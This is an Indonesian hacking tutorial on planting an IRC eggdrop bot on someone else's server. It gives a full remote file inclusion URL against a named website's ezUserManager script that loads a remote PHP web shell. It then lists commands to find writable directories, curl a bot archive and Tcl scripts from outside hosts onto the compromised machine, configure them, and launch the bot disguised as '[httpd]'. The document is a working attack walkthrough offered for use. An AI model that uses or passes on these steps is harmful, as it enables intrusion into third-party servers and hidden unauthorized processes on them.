MEMBUAT EGGDROPS
Nah yang ini lebih keren lagi nih, soalnya ini baru yg dinamakan bene2 bot. kok bisa?? Ya di bisa2in aja. Ok kita mulai cara membuatnya. Udh punya shellnya lum?? Terserah deh mo pake injekan or yg beli secara legal, klo yg injekan cari yg safe mode off. Eh gue ingetin ya, semua modol penjelasan yg ada disini menggunakan shell injekan. Nah nih contoh shell injekannya http://josephli.com.hk/listening/f5/2007/a/ezusermanager_pwd_forgott.php//ezusermanager_pwd_forgott.php?ezUserManager_Path=. Disini saya menggunakan script shell injekan http://h1.ripway.com/zand/s.txt??. Lu buka di browser lu alamat shell injekan ditambah alamat script shell plus tanda ?? ex http://josephli.com.hk/listening/f5/2007/a/ezusermanager_pwd_forgott.php//ezusermanager_pwd_forgott.php?ezUserManager_Path=http://h1.ripway.com/zand/s.txt??. Terserah lu deh, mo pake scrip shell yg mna, bisa pake r57 or c99. tp saran gue biar kita saling konek, lu pake http://h1.ripway.com/zand/s.txt aja.
Ok lu udh buka shell injekan lu, nah disana kan ada tyulisan berisi IP kita, type systemmnya, permission, ma var nya. Dibawahnya lg ada kolom2 tempat kita ngetik command. Di koman ENTER, lu ketik perintah ini find / -perm 777 –type d terus lu klik enter ntar akan ada keluar tulisan berisi direktori yg bisa kita writer nih contohnya
/usr/local/src/libiconv-1.11/src
/usr/local/src/libiconv-1.11/src/.libs
/usr/local/src/libiconv-1.11/lib/.libs
/usr/local/src/libiconv-1.11/libcharset/lib/.libs
/usr/local/src/gettext-0.14.5/gettext-tools/tests/.libs
/usr/local/src/gettext-0.14.5/gettext-tools/src/.libs
/usr/local/src/gettext-0.14.5/gettext-tools/intl/.libs
/usr/local/src/gettext-0.14.5/gettext-tools/lib/.libs
/usr/local/src/gettext-0.14.5/gettext-tools/libuniname/.libs
/usr/local/src/gettext-0.14.5/gettext-runtime/src/.libs
/usr/local/src/gettext-0.14.5/gettext-runtime/intl/.libs
/usr/local/src/gettext-0.14.5/gettext-runtime/libasprintf/.libs
Nah lu copy deh salah satu lsiting folder tersebut, terus lu paste di kotak DIRECTORY terus lu klik LIST.
Nah klo udh lu tinggal bla222222 xixix.
Perlu diingat : klo ndak ada tulisan directory seperti di atas, lu langsung aja bergerak ke folder /tmp/. Lu ketik aja di kolom DIRCTORY tulisan /tmp/ terus ketik LIST
Ntar akan muncul tuh isi director tmp. Klo udh ben lebih cepet an bikin aja directory sendiri di directory tmp. Caranya ketik aja mkdir hafid (hafid itu nama folder) nah terus lu masuk deh di folder tersebut caranya ketik /tmp/hafid di kotak DIRECTORY kerus klik deh LIST.ntar akan ada tulisan pokoknya. Xixix. Nah klo udh lu tinggal downloads file bot ntu. Komandnya ketik di kolom ENTER
curl –f –O http://geocities/jiwangdotus/eggmbonx.tar.gz dan klik enter
ketikan lagi tar –zxvf eggmbonx.tar.gz dan klik enter. Ntar akan muncul deh semua file hasil xtrakan eggmbonx.
Terus lu ketik cd mbonx untuk masuk di directory mbonx. Or lu bisa langsung ketik /tmp/zandra/mbonx di kotak directory reus klik list untuk masuk di directory mbonx
Nah sekarang lu ketik di kotak enter ./nadya conf nickbot indetbot IPbot chanbot ownerbot.
Contohnya ./nadya conf hafidbot botku 123.567.23.05 forza hafid
Terus klik enter. Ntar akan ada tulisan berisi konfigurasi botmu
Nah selanjutnya loe masuk ke direktori scripts kecitk aja cd script or langsung /tmp/zandra/mbonx/scripts. Terus lu ketik di kolom enter curl –f –O http://geocities.com/jongke¬_city/sOlTech.txt terus ubh extensionnya dgn mengetik mv sOlTech.txt ary.tcl nah setelah ntu lu ketikan komendini lagi ./autobotchk conf terus ini lagi cd .. terus terakhir adalah ./run conf [httpd] tingga; tunggu ja botnya join. Terus lu pv botnya n sapa dengan kata hallo nah giu cara. Klo secara listing penggunaannya seperti ini :
1. cd /var/tmp/
2. mkdir hafid
3. cd hafid
4. curl –f –O http://geocities.com/jiwangdotus/eggmbonx .tar.gz
5. tar –zxvf eggmbonx.tar.gz
6. cd eggmbonx
7. ls –al
8. curl –f –O http://geocities.com/jongke_city/chanary.txt
9. mv chanary.txt ary.tcl
10. ls –al
12. ./nadya conf nickbot idrntbot IPbot chanels owner contoj ./nadya conf zandrabot zandra 123.456.432 smanggar zandra (ingat channel ndak usah gawe tanda #)
13. cd scripts
14. curl –f –O http://geocities.com/jongke_city/sOlTecH.txt
15. mv sOlTecH.txt sOlTecH.tcl
16. ./autobotchk conf
17. cd ..
18. ./run conf [httpd] selesai deh tinggal tunggu botnya